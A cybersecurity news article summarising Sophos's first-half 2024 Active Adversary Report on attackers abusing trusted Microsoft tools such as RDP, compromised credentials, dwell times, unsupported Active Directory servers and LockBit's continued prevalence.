SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers
Australia
Guides
#
cloud security
#
cybersecurity
#
endpoint protection
#
firewalls
#
ransomware
Search
Story image
#
Firewalls
#
Ransomware
#
Network Security

Cybercriminals increasingly exploit trusted apps, says report

Today
Author image
By Catherine Knowles, Journalist

The Sophos X-Ops Active Adversary Report for the first half of 2024 reveals a significant increase in cybercriminals exploiting trusted Microsoft applications on Windows networks.

The report highlights a 51% surge in the abuse of trusted applications such as the remote desktop protocol (RDP), a practice termed as abusing living off the land binaries (LOLBins), compared to the previous year, and 83% since 2021.

John Shier, Field CTO at Sophos, stated, "Living-off-the-land not only offers stealth to an attacker's activities but also provides a tacit endorsement of their activities. While abusing some legitimate tools might raise a few defenders' eyebrows, and hopefully some alerts, abusing a Microsoft binary often has the opposite effect."

Shier continued, "Many of these abused Microsoft tools are integral to Windows and have legitimate uses, but it's up to system administrators to understand how they are used in their environments and what constitutes abuse. Without nuanced and contextual awareness of the environment, including continuous vigilance to new and developing events within the network, today's stretched IT teams risk missing key threat activity that often leads to ransomware."

The analysis of nearly 200 incident response cases found that RDP abuse was present in 89% of these incidents, maintaining a trend identified in the 2023 report.

The report also noted that the root cause of attacks remains compromised credentials, responsible for 39% of cases, although this is a decline from 56% noted in 2023. Network breaches were the most common incidents dealt with by the Sophos Managed Detection and Response (MDR) team.

For the Sophos Incident Response (IR) team, the dwell time, which is the duration from the start of an attack to its detection, remained approximately eight days. With MDR involvement, this median dwell time was reduced to one day for all incident types and three days for ransomware attacks.

Another critical finding was related to the vulnerability of Active Directory servers. Attackers most frequently targeted versions 2019, 2016, and 2012, all of which are now out of mainstream Microsoft support and one stage away from end-of-life status, making them challenging to patch without paid support. Notably, 21% of the AD server versions compromised were already end-of-life.

The report also pointed out the impact of governmental actions on ransomware groups. Despite the disruption of LockBit's main leak website and infrastructure in February 2024, LockBit remained the most frequently encountered ransomware group, responsible for approximately 21% of infections in the first half of 2024.

These findings underscore the growing challenges in cybersecurity, notably the increasing sophistication and stealth tactics employed by adversaries exploiting trusted applications within networks to carry out their attacks.

Follow us on:
Follow us on LinkedIn Follow us on X
Share on:
Share on LinkedIn Share on X
Related stories
WatchGuard predicts rise in AI-driven cyber threats by 2025
Gigamon unveils Power of 3 for hybrid cloud visibility
Cybersecurity predictions warn of AI, quantum threats ahead
Cybersecurity in 2025: Rise of non-human identities
CSIS report reveals surge in sophisticated cyber threats
Top stories
Exabeam forecasts AI to transform APAC cybersecurity by 2025
Titan of Tech - Curtis Raams of Prvidr
Akamai reveals $9.6m benefit and 152% ROI from Guardicore use
CyberCX extends partnership with Australian Open for 2025
KnowBe4 named among 2025 best IT workplaces by Computerworld